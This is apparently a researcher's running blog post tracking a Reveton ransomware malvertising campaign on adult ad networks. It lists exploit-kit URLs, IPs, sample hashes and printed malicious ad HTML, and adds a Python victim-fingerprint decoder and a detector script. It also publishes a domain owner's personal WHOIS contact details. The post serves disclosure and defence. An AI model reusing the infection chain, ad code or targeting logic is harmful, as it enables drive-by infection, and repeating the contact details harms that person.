[en] Reveton Malvertising campaign

My bad on the October 10 EDIT of http://www.malekal.com/2013/05/29/en-ero-advertising-malvertising-for-flimrans-ransomware-campaign/ :
it's not Flimrans ransomware but Reveton, delivered by a new exploit kit called « Angler EK ».
Here is an update on the malvertising at TrafficHolder:

http://candy.dandydaddy.net/geo6/go.php?sid= (88.214.200.190) – 0 @ VT https://www.virustotal.com/fr/url/2311b4dc009ad342529377a3ee9e2a0f4c1e291b5bc546b947368129042abef0/analysis/1381736738/
http://55grey.live1asmin.com/monster/monster.php (88.214.200.190) – 0 @ VT https://www.virustotal.com/fr/url/6ddf5caa515b108d06f2725893f84b4a8265c903531560eab684adbccfb9e91c/analysis/1381736744/
http://efjyp.carpetcleaningplymouthmn.com/ak0iwxd15s

Sample : http://malwaredb.malekal.com/index.php?hash=b04c68fc55a02e91c8c6041393ab4ffd

(screenshot: Reveton_TrafficHolder)

EDIT –

Update on one I already covered (milf-bitches.com) there: http://www.malekal.com/2013/05/29/en-ero-advertising-malvertising-for-flimrans-ransomware-campaign/

http://ilikeshavedpussy.com/ (178.214.121.17) – 1 @ https://www.virustotal.com/fr/url/a6beccc02362571b724b9ee25b66dadbf43f771892806afe09bc94897bbc048f/analysis/1381774125/
http://mfzoomakridgetluszcze.pacificbuilders.us/secure_320.swf
http://baby.blindfoldtest.com/ (185.25.51.146)
http://newstheblues.la-z-boy-repair.com/g1ex23cu9i

Sample : http://malwaredb.malekal.com/index.php?hash=6c51d42f857576fb9523405f96274456

(screenshots: Reveton_Malvertising, Reveton_Malvertising2)

EDIT 15 October

http://50den.com/
http://beskrivelsesramme.govention.com/312_300x250.swf – 0 @ VT https://www.virustotal.com/fr/url/afad635c188316eebeebc2ae19a86f0b42754b6c78bc4ffd221e776e1d128db4/analysis/1381830086/
http://sorry.itch-gone.com/ – 0 @ VT https://www.virustotal.com/fr/url/b530c9a05be0b58d42e078f6c1665cbef0277908e6143a03d0cdb76081abbfc6/analysis/1381830092/
http://autauga.elementengineering.us/u0oj982n1u
http://autauga.elementengineering.us/0u0oj982n1ukhj
http://autauga.elementengineering.us/META-INF/services/javax.xml.datatype.DatatypeFactory
http://autauga.elementengineering.us/META-INF/services/javax.xml.datatype.DatatypeFactory
http://autauga.elementengineering.us/1u0oj982n1ukhj

SWF Sample : http://malwaredb.malekal.com/index.php?hash=39b24afbf28a11819a90d26263b81eef
Reveton Dropper : http://malwaredb.malekal.com/index.php?hash=b49223a3e4229a884c0213fe22476d29

I have contacted the webmaster at 50den; it will be removed soon!

(screenshot: Reveton_Malvertising)

EDIT

http://hit.trafficholder.com/cgi-bin/traffic/process.fcgi?a=ace&n=&r=
http://33.suck-my-candy.com/geo/geo.php – 0 @ VT https://www.virustotal.com/fr/url/eb006b0cfe778491d0657285ec15078116b5837eacda851fb4b83f5842127b76/analysis/1382109790/
http://monotricgelykes.magnificentmilecompanions.com/sn35aypwai
http://monotricgelykes.magnificentmilecompanions.com/0sn35aypwaikhj
http://monotricgelykes.magnificentmilecompanions.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://monotricgelykes.magnificentmilecompanions.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://www.hot-sex-tube.com/img2.php?ref=sex-hq.com&t=d29e5296

Sample : http://malwaredb.malekal.com/index.php?hash=4f683232ae146b97b0e2f92589ac9ce6

(screenshot: malvert)

EDIT

http://stun.tileremovalpompano.com/291111.js (144.76.141.103) – 1 @ VT : https://www.virustotal.com/fr/url/d52887bd77c0761efa178dd8604bfb40d02adc61cf7e6f0bcd277f7d3c1e0fd4/analysis/1382132371/
http://developedness-leichtglaeubigste.acesdiamondscompanions.com/11.swf (144.76.141.212) – 0 VT https://www.virustotal.com/fr/url/a29b92e5defc72638da01e4e50f6742ad7bbe61b8eeee105910f3146c451fd15/analysis/1382132391/
http://admedia.midmemedia.com/ (185.25.51.157) – 0 VT https://www.virustotal.com/fr/url/b55cc41d9201edafece58fc133de36f50baf6dad786651c0f8bb5043586089cd/analysis/1382132381/
http://overfastidiousalarmgauge.creativecasualcuisine.net/xhsvw33w9m

(screenshots: Reveton_Malvertising, Reveton_Malvertising2)

EDIT October 19

On x3xtube:

http://entomion.notyouraveragejoes.mobi/312_300x250.swf (144.76.141.213) – 1 @ VT https://www.virustotal.com/fr/url/797d6a3b66710dc7302cae3abefc7814212c5d68e7d1b3e4bcdcf5ef123dfc0b/analysis/1382218399/
http://slide.quick-steplaminateflooring.org/?302e302e302e307c7c302e302e302e307c7c302e302e302e307c7c333132 (144.76.117.28) – 0 @ VT https://www.virustotal.com/fr/url/bd10350d2531770d5c09f310a502dac0cad02f0a32ca1367f9bf9e22cfa0b93e/analysis/1382218410/
http://privatehomeclips.com/videos/cute-wife-sucking-pov-getting-his-hot-cum-on-face/?promo=1102 (109.206.188.19) – 2 @ VT https://www.virustotal.com/fr/url/a4a34ff6f2c73cd27e16ced2f79662d682afda07bb822f4bb8ea2ceb003d0f63/analysis/1382218421/
http://rebrousserontscozzand.notyouraveragejoes.com/6nmlys9mmn

The SWF Script : http://pjjoint.malekal.com/files.php?read=20131019_v12p12s6k12y6
Sample : http://malwaredb.malekal.com/index.php?hash=5d5caa450d42ebb29e591815754cc8c2 and http://malwaredb.malekal.com/index.php?hash=540fb4f6aaa533dbdf03a2be6195ee6d
Admin Name:Timothy Shimko
Admin Organization:Not Your Average Joe’s
Admin Street1:151 Campanelli Dr
Admin Street2:Suite C
Admin City:Middleborough
Admin State/Province:Massachusetts
Admin Postal Code:02346
Admin Country:US
Admin Phone:+1.7742132800
Admin FAX:+1.7742132899
Admin Email:tshimko@nyajoes.com

With tshimko@nyajoes.com we also have:
Nyajoes.biz
Joe-to-you.com

(the URL for the Urausy banner is http://adsholder.net/banner_350.flv 1 @ VT https://www.virustotal.com/fr/url/17585195a1ba2b9706ebe1b4e55291fbb2469d2e86c9cd0d16212ac4f201f7aa/analysis/1382218572/)

(screenshots: Reveton_Malvertising, Reveton_Malvertising2, Reveton_Malvertising3)

EDIT October 21

http://dolly.shemale-star.com/6/go.php?sid=2 (88.214.200.190) – 0 @ VT https://www.virustotal.com/fr/url/f49daaec20fe2ff26bcb52ba3027a37aa8f524d8d052e1da86e3c6d314bbc2e7/analysis/1382354215/
http://66lab.lucysextape.com/geo/geo.php (88.214.200.190) – 0 @ VT https://www.virustotal.com/fr/url/fce951755d723daf057a09291ed5023ebbd1498f826dae3b558428543059dcc6/analysis/1382354223/
http://hawkbell.me-cfscommunity.com/ej8lejnjjg

Sample : http://malwaredb.malekal.com/index.php?&hash=2b2d5333eaba0e94acc37491419aae03

(screenshots: Reveton_Malvertising, Reveton_Malvertising2)

EDIT October 28

Following a malvertising at www.overthumbs.com these last days: it dropped Urausy, but today it's Reveton: http://urlquery.net/report.php?id=7190829 (see JavaScript #2 and #3)

http://adstraffik.pulseyourself.com/409996.js (144.76.141.102)
–> http://completa.alphabetlife.com/banner2_1367008940.swf
–> SWF/JS :: outfitinvestigate.com (s2438.soft-com.biz)
.. outfitinvestigate.com/add/getJavaInfo.jar
.. outfitinvestigate.com/add/addon2.js
.. outfitinvestigate.com/add/addon2.js
( 88.214.227.8/add/getJavaInfo.jar
88.214.227.9/add/getJavaInfo.jar
88.214.227.10/add/getJavaInfo.jar
88.214.227.11/add/getJavaInfo.jar )
POST http://88.214.227…./?url=1
Then Exploit kit : http://bapujds.thehavazoo.com:6173/acct_login/etc/filefun.php?join=3
Sample : http://malwaredb.malekal.com/index.php?hash=d785b296243f6c77f18ee6cbfc421023


Today :

http://adstraffik.pulseyourself.com/409996.js (144.76.141.102) – 4 @ VT https://www.virustotal.com/fr/url/5cd0ae6b655832dfde242d6af289233d47bb8f0f638cebd545c014960ab679df/analysis/1382992002/
http://diastereoisomer.securiconsystems.com/banner2_1367008940.swf (144.76.141.213) – 1 @ VT https://www.virustotal.com/fr/url/5af611707cc5fe458d183751e38a88652fa47be1bfa737329cc2fae56979f2e0/analysis/1382992297/
http://day.thehighgrovesingers.com/?31302e312e332e32337c7c312e372e302e367c7c31302e332e3138332e31317c7c333134 (144.76.117.6)
http://attention.lionsclubpacesetters.com/ (185.25.51.151)
Then Exploit kit : http://devisengeschaeft.passaicarea.com/j18qwols3y


SWF sample : http://malwaredb.malekal.com/index.php?hash=148a8050eb490609125678b073b0345d
Dropper : http://malwaredb.malekal.com/index.php?hash=bdef04e22bdf625b6c142bab34fa4b56

SWF sources :
http://pastebin.com/tWVdk9Sj
http://pastebin.com/xiH9VSbz

The SWF fingerprints the browser and plugin versions (PDF, Flash and Java); the Java version must be between 1.6 and 1.7.0.21 (from 7u21 on, Java prompts with a security dialog before running an applet, so the kit stops there).
The plugin versions are passed to the external URLs as hex-encoded ASCII in the query string.
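The query strings in the redirector URLs above (e.g. `?31302e312e332e32337c7c...`) are plain hex of ASCII, and decode to `||`-separated version strings. The following decoder is an added example, not code from the original post: it decodes the fingerprint from the URLs listed here and applies the Java window the post describes (1.6 to 1.7.0.21). The field order PDF, Java, Flash, banner id is an assumption inferred from the decoded values (10.1.3.23 looks like Adobe Reader, 1.7.0.6 like Java 7u6, 10.3.183.11 like Flash Player, and the last field matches the numbers in the SWF names); `0.0.0.0` is taken to mean "plugin absent".

```python
"""Decode the plugin fingerprint that the malvertising SWF appends to the
redirector URLs listed in this post, and apply the Java version gate.
Added example; the field order below is an assumption, not something the
post states."""
import binascii
from urllib.parse import urlsplit

# Assumed order, inferred from the decoded values on this page.
FIELDS = ("pdf", "java", "flash", "banner_id")
ABSENT = "0.0.0.0"          # what the SWF reports when a plugin is missing

JAVA_MIN = (1, 6)           # post: Java must be between 1.6 and 1.7.0.21
JAVA_MAX = (1, 7, 0, 21)    # 7u21 and later prompt before running the applet


def decode_hex_query(url):
    """Return the plaintext hidden in the query string (hex of ASCII)."""
    query = urlsplit(url).query
    return binascii.unhexlify(query).decode("ascii")


def parse_fingerprint(url):
    """Split the decoded query on '||' and name the fields.

    Some URLs carry only the banner id (e.g. '?333138' -> '318'); every
    other field is then reported as None."""
    parts = decode_hex_query(url).split("||")
    if len(parts) == 1:
        parts = [ABSENT] * 3 + parts
    if len(parts) != len(FIELDS):
        raise ValueError("unexpected field count: %r" % parts)
    fp = dict(zip(FIELDS, parts))
    for name in ("pdf", "java", "flash"):
        if fp[name] == ABSENT:
            fp[name] = None
    return fp


def version_tuple(version):
    """'1.7.0.6' -> (1, 7, 0, 6); tuples compare component-wise."""
    return tuple(int(x) for x in version.split("."))


def java_in_range(version):
    """True when the Java version falls inside the window the SWF targets."""
    if not version or version == ABSENT:
        return False
    return JAVA_MIN <= version_tuple(version) <= JAVA_MAX


def is_target(fp):
    """The kit only redirects victims whose Java is in the window."""
    return java_in_range(fp["java"])


if __name__ == "__main__":
    # URLs copied from the traces in this post
    for u in (
        "http://slide.quick-steplaminateflooring.org/?302e302e302e307c7c302e302e302e307c7c302e302e302e307c7c333132",
        "http://day.thehighgrovesingers.com/?31302e312e332e32337c7c312e372e302e367c7c31302e332e3138332e31317c7c333134",
        "http://floor.buriedstructures.com/?333138",
    ):
        fp = parse_fingerprint(u)
        print(fp, "-> target" if is_target(fp) else "-> skip")
```

The second URL decodes to a machine with Reader 10.1.3.23, Java 1.7.0.6 and Flash 10.3.183.11 and is in the window; the first reports no plugins at all and is skipped.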

(screenshots: Reveton_Malvertising, Reveton_Malvertising2, Reveton_Malvertising3)


The same kind is at privatehomeclips.com:

http://partners.privatehomeclips.com/300250gay.swf?clickTAG=http://3dgaytales.com/
http://account.castilloroofinginc.com/?31302e312e332e32337c7c312e372e302e367c7c31302e332e3138332e31317c7c333137 (144.76.117.27)
but the redirection to the exploit kit seems to be disabled.

The SWF sources are a bit different but the goal is the same :
http://pastebin.com/2vvkybd9
http://pastebin.com/uWtiNQBv

EDIT October 29 (SWF Malvert & Creoads)

Okay, the malvertising at www.overthumbs.com is now cleaned; it was on tuberewards net .doublegear.com / trw12.com
The redirection to the exploit kit at privatehomeclips.com is now enabled – Sample : http://malwaredb.malekal.com/index.php?hash=54deed208948bb5321c65f780f609f27
Trying to get it removed.

(screenshot: privatehomeclips_malvertising)

There is also a malvertising on the Creoads network (http://creoads.com/); I have contacted them, we'll see if they move.

http://creoads.com/server/delivery/render/7986202730/7985958849/get?zoneid=7986202730&domain=overthumbs.com&cat=amateur&st=tube&host=1.5&uid=7705052716&crid=7985958849&location=http%3A%2F%2F192.168.1.5%2Ftest.html&referrer=
http://carriage.amazon-rainforest-facts.com/862189.html (144.76.141.100) – 0 @ VT : https://www.virustotal.com/fr/url/aaefaf55ecde18c43bdecd77ebad5a7cc3dab251a7e7aab360ebb61702d52664/analysis/1383034525/
http://minutissimic.prymesecurity.com/311_728x90.swf?clickTAG=http://www.nudeblackwomenphotos.com (144.76.141.213)

Please blacklist carriage.amazon-rainforest-facts.com

(screenshot: creoads_malvertising)

EDIT October 30 (Traffichold Hack)

traffichold.com malvertising

http://cs.traffichold.com/www/delivery/afr.php?zoneid=109&cb=INSERT_RANDOM_NUMBER_HERE&wm=16495&pr=4021117&prd=300x250&ts=failover&tsd=banner&prm=rev
http://offline.bizzapp.com/pagead/show_ads.js (85.17.156.88) – 1 @ VT https://www.virustotal.com/fr/url/cd899b5c7af4496e20cd4abdb4db4c2595c9c2d51bd5090bd6d6dd7a52df990d/analysis/1383154059/
http://benit.citizensinvestigativeservice.com/y2cebej2w6

http://cs.traffichold.com/www/delivery/afr.php?zoneid=932&cb=&wm=16495&prm=rev&pr=4046036&prd=&keyword=extreme,pissing&ts=bcbanner&tsd=pc_ban_global_18_300x250_all
http://orgasm.ratemysketa.com/pagead/show_ads.js (85.17.156.88) – 1 @ VT https://www.virustotal.com/fr/url/a10c0043df0c0ba2a8d4bc001283326b53a45c18ce2992e8f4eb315bc0da1d80/analysis/1383154745/
http://geita.antiquipawntique.com/upkeuge367

Sample : http://malwaredb.malekal.com/index.php?hash=bf8e9e4eac5113b8a38eac10c05eb9de

(screenshots: offline.bizzapp.com, ratemysketa.com)

EDIT October 31 (Traffichold hack)

http://syndication.traffichaus.com/adserve/index.php?z=142
http://cs.traffichold.com/www/delivery/afr.php?zoneid=1387&cb=1969502
http://forum.fundsrecovered.com/pagead/show_ads.js (85.17.156.88) – 0 @ https://www.virustotal.com/fr/url/0bb5a46b411c644bec93d55a111a9a6a92eb5fc6f04aab5b0da2340236e74a47/analysis/1383231117/
http://biegroman.allergyzapper.com/vosu9jqyys

Sample : http://malwaredb.malekal.com/index.php?hash=1883e78a129f379296f590af83e50a24

(screenshots: forum.fundsrecovered.com, forum.fundsrecovered.com2, forum.fundsrecovered.com3)

EDIT November 4 (TrafficHolder Malvert)

Both on TrafficHolder:
http://oldturtle.net/ (72.249.5.64) 0 @ VT https://www.virustotal.com/en/url/8697dfa087af0050713be394b8b2fdb757f2521e9adffeed1eafcac347ec5753/analysis/1383575732/
http://tiplej.pw/js/style.php (188.116.23.43) – 0 @ VT https://www.virustotal.com/en/url/a60de635f077ee9597889f96ed90cdc819cc2f8c43e14d767a67a1344d0c471d/analysis/1383575577/
http://tiplej.pw/tr.php
http://xogh4pe.nowebsto.net:8000/etyfxbmjgtgxp?zjsurm=1307818

http://londonprivatehire.net/tds/fr.php (199.168.136.218) – 1 @ VT https://www.virustotal.com/en/url/4666a48790127181a10d5e2c64c40ffcb6081bf6183afe57bf855f14b409e97a/analysis/1383576598/
http://iph4tha.nowebsto.net:8000/aforxvxnt?fxfvcqquckms=6061419

(screenshots: malvert_londonprivatehire.net, malvert_londonprivatehire.net2, tiplej.pw_malvertising, tiplej.pw_malvertising2, tiplej.pw_malvertising3)

EDIT November 7 (Creoads)

On creoads network :

http://creoads.com/server/delivery/render/7695485983/7695416534/get?zoneid=7695485983&domain=homemoviestube.com&cat=multiniche&st=tube&host=trw12.com&uid=7687685088&crid=7695416534&location=http%3A%2F%2Fwww.homemoviestube.com%2Fvideos%2F155604%2Fcum-facial-for-little-blonde.html&referrer=http%3A%2F%2Fwww.homemoviestube.com%2Fvideos%2F155604%2Fcum-facial-for-little-blonde.html
http://law.letsimmigrate.com/364754.html (144.76.141.102) – 0 @ VT https://www.virustotal.com/en/url/3f4e438d783917419d65ff0adc613f40d423ad4dd925712c0fe0fb59e04fc591/analysis/1383842369/
http://valmistusvaiheissa.senioradvantagenetwork.com/banner2.swf?clickTAG=http://EbonyInvite.com (144.76.141.213) – 0 @ VT https://www.virustotal.com/en/url/96c995558935afbcd6ff37c9fdb7fba3d7c2555e5f4c0f7f18a555e06626f8e7/analysis/1383842386/
http://floor.buriedstructures.com/?333138 (144.76.117.6) 1 @ VT https://www.virustotal.com/en/url/7a327503bf9cca066879b3114d17b6a6ef72e425592cd6ac8bb4ba7866798d84/analysis/1383842394/
http://nation.elegantbucks.com/ (185.25.51.153) – 1 @ VT https://www.virustotal.com/en/url/749b7b7a8affa154c21c09bc4b25a16bd9f34308585a7871163b225c402b594b/analysis/1383842402/
http://modorrillo.syn-flexusa.com/qqf0ya2ve2

Sample : http://malwaredb.malekal.com/index.php?hash=dd0979c85a68c4344b1689c0933cad65

(screenshots: creoads_reveton_malvertising, creoads_reveton_malvertising2, creoads_reveton_malvertising3, creoads_reveton_malvertising4)

EDIT November 9 (Creoads)

A new one on pornerbros.com, and yeah, the Urausy malvertising is still online there.

via creoads :

http://creoads.com/server/delivery/render/8475360172/8475412333/get?zoneid=8475360172&domain=w3schools.com&cat=multiniche&st=tube&host=pornerbros.com&uid=8048310810&crid=8475412333&location=http%3A%2F%2Fwww.pornerbros.com%2F272133%2Fsexy-brunette-and-hot-blonde-get-banged.html&referrer=http%3A%2F%2Fwww.pornerbros.com%2F291525%2Fsweet-blonde-gives-dazzling-blowjob.html
http://knife.waytomakemoneyonlyne.com/800_300_250.html (144.76.141.103)
http://xpixelinfojsenmaksuja.myoncoseek.org/800_300_250.swf?clickTAG=http://www.doctorfox.co.uk
http://agree.starlightranchinc.com/?302e302e302e307c7c312e372e302e367c7c31302e332e3138332e31317c7c383030 (144.76.117.29)
http://rvhtmttmllpoligrafica.myoncoseq.com/8qqvm8cqfu (91.231.85.19)

Sample : http://malwaredb.malekal.com/index.php?hash=9ecb9953be391fea8c2295cd0fd4a97f

(screenshots: creoads_pornerbros, creoads_pornerbros2, creoads_pornerbros3)

EDIT –

The last one has probably been shut down by GoDaddy; all the domains were on GoDaddy. According to them, the malware guys used hacked accounts (probably like in the past: http://nakedsecurity.sophos.com/2012/11/23/hacked-go-daddy-ransomware/ ).
Nice support from GoDaddy, and hat tip to kafeine for pointing this out 🙂

EDIT November 11 (Creoads)

Moved from a hacked GoDaddy account to a hacked EuroDNS account: luisaviaroma.dk / luisaland.eu

http://creoads.com/server/delivery/render/8475360172/8475412333/get?zoneid=8475360172&domain=w3schools.com&cat=multiniche&st=tube&host=judgeporn.com&uid=8048310810&crid=8475412333&location=http%3A%2F%2Fwww.judgeporn.com%2Fvideos%2Fsexy-brunette-holly-michaels-toys-her-wet-pussy-with-glass-dildo%2F&referrer=http%3A%2F%2Fwww.judgeporn.com%2Fvideos%2Fsexy-brunette-holly-michaels-toys-her-wet-pussy-with-glass-dildo%2F

http://town.luisaviaroma.dk/800_300_250.html – 2 @ VT https://www.virustotal.com/en/url/aa53b1b0d0aa14f9dfaad3f16ef9ce8ad9f920b696f8dffc719a2be5ab05bc92/analysis/1384164812/
http://land.luisaland.eu/800_300_250.swf?clickTAG=http://www.meendo.com/photoalbums/?partner=6688 – 1 @ VT https://www.virustotal.com/en/url/c7aa0f1344e17766fa318ff05bb166847d9b3efe8becead7928fdf3557634a4a/analysis/1384164925/

http://cut.statetaxbrokerage.us/?302e302e302e307c7c312e372e302e367c7c31302e332e3138332e31317c7c383030
http://at.kelseyelectric.com/
http://traspiregrensbepalings.jcpublishers.org/b2qh26s72a

Hosted by Hetzner:

town.luisaviaroma.dk has address 144.76.136.34
land.luisaland.eu has address 144.76.136.182

(screenshot: Reveton_malvertising)

EDIT – November 12 (Creoads)

Still Creoads:

http://creoads.com/server/delivery/render/8475360172/8475412333/get?zoneid=8475360172&domain=w3schools.com&cat=multiniche&st=tube&host=pornerbros.com&uid=8048310810&crid=8475412333&location=http%3A%2F%2Fwww.pornerbros.com%2F294317%2Fthe-lust-resort-scores-one-again.html&referrer=http%3A%2F%2Fwww.pornerbros.com%2F
http://dl.dropboxusercontent.com/s/fsb3jmurx6j7d77/603_300_250.html (204.236.226.117)
http://hollow.quintalasaves.com/? (144.76.136.250)
http://lock.modernarchaeology.org/ (185.25.51.146)
http://beadhousisrouter.smartworkleadership.com/om9y6ittno

dl.dropboxusercontent.com/s/fsb3jmurx6j7d77/603_300_250.html loads the malvert at http://start.sendblaster.hu/603_300_250.swf (144.76.137.26)

Sample : http://malwaredb.malekal.com/index.php?hash=6cfb0e023b3fdb12a4047830265e4892
SWF : http://malwaredb.malekal.com/index.php?hash=903a5ca42293d67d1481e7c5857533b7

Seriously, Creoads! How is it possible to authorize Dropbox links? Don't be surprised if you end up serving malicious content.

(screenshots: Reveton_Malvert, Reveton_Malvert2, Reveton_Malvert3)

EDIT November 15 (Kovter Malvert & Group goo.gl)

Two Malvertising on judgeporn.com :

http://cdn.judgeporn.com/ads/r2.html

<html><head><title></title></head><body style="background-color:transparent; margin:0; outline-offset:0;">
<!-- The ".flv" is handed to the Flash plugin (type application/x-shockwave-flash below), so it runs as a SWF whatever the extension says -->
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="300" height="250" id="banner350" align="middle">
<!-- allowScriptAccess="always" lets the SWF call JavaScript in the page that embeds it -->
<param name="allowScriptAccess" value="always">
<param name="movie" value="http://advert-creative.net/adultwebdating.flv">
<param name="quality" value="high">
<param name="bgcolor" value="#ffffff">
<embed src="http://advert-creative.net/adultwebdating.flv" quality="high" bgcolor="#ffffff" width="300" height="250" name="ppbanner" align="middle" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer">

</object>
</body>
</html>

~~

http://cdn.judgeporn.com/ads/r3.html

<html><head><title></title></head><body style="background-color:transparent; margin:0; outline-offset:0;">

<iframe width="300" height="250" frameborder=0 scrolling="no" src="https://stats.qualitytrafficmedia.net/?id=Fmnrior8365&track=IRjmfjhd83759&YRnfjfv84674"></iframe>

</body>
</html>

The second is the same kind as the Kovter malvertising we saw in the past: http://www.malekal.com/2013/09/27/13323/ but now it's delivering Reveton.
http://stats.qualitytrafficmedia.net:443 – 0 @ VT https://www.virustotal.com/fr/url/611467ca31c7181cf419e14ff181637ad86fac0fff35b3e9fc077c9e45fcfe6c/analysis/1384504603/
http://goo.gl:443
http://towarzyszy-hangman0.domcarga.com/8kc2nne6x9
http://towarzyszy-hangman0.domcarga.com/08kc2nne6x9bik
http://towarzyszy-hangman0.domcarga.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://towarzyszy-hangman0.domcarga.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://towarzyszy-hangman0.domcarga.com/18kc2nne6x9bik

(screenshots: Judgeporn, Judgeporn2, Judgeporn3)

EDIT – (Group goo.gl)

This one is very interesting, found on 4sex4, but I have already seen these banners on other websites.

(screenshot: 4sex4.com)

sunmecdn.com/ads/init.js (108.162.198.76) sends some parameters (sun_init.adname etc.).

sunmecdn.com returns the domain of the ads, here admecnd.com (108.162.196.202).

That domain then builds the advert from the parameters, and also an iframe to goo.gl.

Then goo.gl redirects to the exploit kit.

(screenshots: 4sex4.com3, 4sex4.com4, 4sex4.com5)

http://sunmecdn.com/ads/init.js – 1 @ VT https://www.virustotal.com/fr/url/66403eb68003d28abf6ce9e1ef108520b95177f3230087afa2906b8098f5c7ad/analysis/1384520535/
http://admecnd.com/gif/1384518624619/9bf31c7f15/www.4sex4.com/cutelivecams.com_.js – 0 VT https://www.virustotal.com/fr/url/71a063ac1cac4812d0927710cd6fdf12f6d12dda81ea94407dd04f0307915c96/analysis/1384520559/
http://goo.gl:443
http://nagi-kultusministeriums.glablesrealtyteam.com/jedin485xo
http://admecnd.com/gif/0/9bf31c7f15/a/f/loaded=417/y.ping
http://nagi-kultusministeriums.glablesrealtyteam.com/0jedin485xobik
http://nagi-kultusministeriums.glablesrealtyteam.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://nagi-kultusministeriums.glablesrealtyteam.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://nagi-kultusministeriums.glablesrealtyteam.com/1jedin485xobik

A nice one, probably present on other porn websites.

Sample : http://malwaredb.malekal.com/index.php?hash=89c00c50f731d1a0e46748cadc02ebfd
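The exploit-kit request sequences listed throughout this post (the goo.gl chain just above, and the TrafficHolder, Creoads and judgeporn ones earlier) share one shape: a landing page at a ten-character path, then /0<id><suffix> and /1<id><suffix>, with the Java plugin's META-INF/services/javax.xml.datatype.DatatypeFactory lookup (the service lookup the Java runtime performs against the applet codebase) in between. The script below is an added detection example, not code from the original post: it scans a constructed proxy log for that shape. The log lines are built from URLs in this post; the 0/1 stage requests for passaicarea.com are assumed (the post lists only its landing page), and the three-letter suffix rule is taken from the khj/bik suffixes seen here.

```python
"""Flag the exploit-kit request sequence that recurs in the traces of this post.
Added example; the pattern (10-char landing path, /0<id><sfx>, Java
META-INF/services lookup, /1<id><sfx>) is taken from the URL lists above."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

LANDING_RE = re.compile(r"^/([a-z0-9]{10})$")
STAGE_RE = re.compile(r"^/([01])([a-z0-9]{10})([a-z]{3})$")
JAVA_LOOKUP = "/META-INF/services/javax.xml.datatype.DatatypeFactory"

# Constructed sample log, one request per line: "<timestamp> <client> <url>".
# The 0/1 stages for passaicarea.com are assumed; the post shows only its landing URL.
SAMPLE_LOG = """\
1382992002 10.0.0.5 http://adstraffik.pulseyourself.com/409996.js
1382992003 10.0.0.5 http://diastereoisomer.securiconsystems.com/banner2_1367008940.swf
1382992004 10.0.0.5 http://devisengeschaeft.passaicarea.com/j18qwols3y
1382992005 10.0.0.5 http://devisengeschaeft.passaicarea.com/0j18qwols3ykhj
1382992006 10.0.0.5 http://devisengeschaeft.passaicarea.com/META-INF/services/javax.xml.datatype.DatatypeFactory
1382992007 10.0.0.5 http://devisengeschaeft.passaicarea.com/1j18qwols3ykhj
1382992010 10.0.0.7 http://towarzyszy-hangman0.domcarga.com/8kc2nne6x9
1382992011 10.0.0.7 http://towarzyszy-hangman0.domcarga.com/08kc2nne6x9bik
1382992012 10.0.0.9 http://www.example.com/abcdefghij
1382992013 10.0.0.9 http://www.example.com/style.css
"""


def parse_line(line):
    """'<ts> <client> <url>' -> (ts, client, host, path)."""
    ts, client, url = line.split(" ", 2)
    u = urlsplit(url)
    return int(ts), client, u.hostname, u.path


def find_ek_chains(log_text):
    """Group requests per (client, host) and score them against the pattern.

    A lone ten-character path is common on legitimate sites, so a host is
    only reported once a /0<id> or /1<id> stage for the same id follows it;
    the Java service lookup upgrades the verdict to 'confirmed'."""
    seen = defaultdict(lambda: {"landing": set(), "stages": set(), "java_lookup": False})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, client, host, path = parse_line(line)
        rec = seen[(client, host)]
        m = LANDING_RE.match(path)
        if m:
            rec["landing"].add(m.group(1))
        m = STAGE_RE.match(path)
        if m and m.group(2) in rec["landing"]:   # stage must reuse the landing id
            rec["stages"].add(m.group(1))
        if path == JAVA_LOOKUP:
            rec["java_lookup"] = True

    hits = []
    for (client, host), rec in seen.items():
        if not (rec["landing"] and rec["stages"]):
            continue
        hits.append({
            "client": client,
            "host": host,
            "landing": sorted(rec["landing"]),
            "stages": sorted(rec["stages"]),
            "verdict": "confirmed" if rec["java_lookup"] else "suspect",
        })
    return hits


if __name__ == "__main__":
    for hit in find_ek_chains(SAMPLE_LOG):
        print("%(verdict)s: %(client)s -> %(host)s (landing %(landing)s, stages %(stages)s)" % hit)
```

On the sample, passaicarea.com comes out "confirmed" (landing, both stages and the Java lookup) and domcarga.com "suspect" (landing plus one stage only), while example.com's ten-character path on its own is ignored.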

EDIT – Bongacams (group goo.gl)

Seen on privatehomeclips.com and also on alotporn.com:

(screenshot: Alotporn.com2)

EDIT – BongaCams (Group goo.gl)

Fun at hdteensexvideos.com: the same malvertising twice:

http://sunmecdn.com/ads/init.js – 2 @ VT https://www.virustotal.com/fr/url/66403eb68003d28abf6ce9e1ef108520b95177f3230087afa2906b8098f5c7ad/analysis/
http://ytrrcdn.com/ads/init.js – 0 @ VT : https://www.virustotal.com/fr/url/b3c87480ad3495d42b52b790c9963a88db782d30962ca77d5f0459fdf40e75e8/analysis/1384536392/
http://admecnd.com/gif/1384535856241/1f0e3dad19/delivery.hornyspots.com/cutelivecams.com_.js
http://admecnd.com/gif/0/70efdf2e17/a/f/loaded=7/y.ping
http://goo.gl:443
http://selfsustainedrazvoj12.domcarga.net/3mps34neoa
http://selfsustainedrazvoj12.domcarga.net/03mps34neoabik
http://selfsustainedrazvoj12.domcarga.net/META-INF/services/javax.xml.datatype.DatatypeFactory
http://selfsustainedrazvoj12.domcarga.net/META-INF/services/javax.xml.datatype.DatatypeFactory
http://selfsustainedrazvoj12.domcarga.net/13mps34neoabik

(screenshots: hdteenmovies, hdteenmovies2)

EDIT – November 16 (Cleaning Time)

  • twr12.com and hornyspots networks cleaned
  • Alotporn.com cleaned; Google Safe Browsing blacklists it
  • still on judgeporn and privatehomeclips.

(screenshot: alotporn.com_cleaned)

EDIT – Malvert @ creoads still online

On realgfporn.com, which, along with x3xtube.com, judgeporn.com and privatehomeclips, is often delivering malvertising 😉

(screenshot: creoads_malvertising_reveton)

EDIT November 18 (TrafficBroker Malvert)

Both are TrafficBroker malvertising, 0 detections at VT:

